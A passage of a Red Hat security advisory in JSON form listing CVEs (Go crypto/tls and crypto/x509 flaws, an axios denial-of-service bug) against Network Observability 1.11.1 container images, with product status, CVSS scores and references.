"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "crypto/x509: golang: Denial of Service due to excessive resource consumption via crafted certificate"
},
{
"cve": "CVE-2025-68121",
"discovery_date": "2026-02-05T18:01:30.086058+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2437111"
}
],
"notes": [
{
"category": "description",
"text": "During session resumption in crypto/tls, if the underlying Config has its ClientCAs or RootCAs fields mutated between the initial handshake and the resumed handshake, the resumed handshake may succeed when it should have failed. This may happen when a user calls Config.Clone and mutates the returned Config, or uses Config.GetConfigForClient. This can cause a client to resume a session with a server that it would not have resumed with during the initial handshake, or cause a server to resume a session with a client that it would not have resumed with during the initial handshake.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/tls: Unexpected session resumption in crypto/tls",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le"
],
"known_not_affected": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "RHBZ#2437111",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437111"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-68121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68121"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://go.dev/cl/737700",
"url": "https://go.dev/cl/737700"
},
{
"category": "external",
"summary": "https://go.dev/issue/77217",
"url": "https://go.dev/issue/77217"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk",
"url": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4337",
"url": "https://pkg.go.dev/vuln/GO-2026-4337"
}
],
"release_date": "2026-02-05T17:48:44.141000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-02T07:50:38+00:00",
"details": "For details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6428"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "crypto/tls: Unexpected session resumption in crypto/tls"
},
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x"
],
"known_not_affected": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
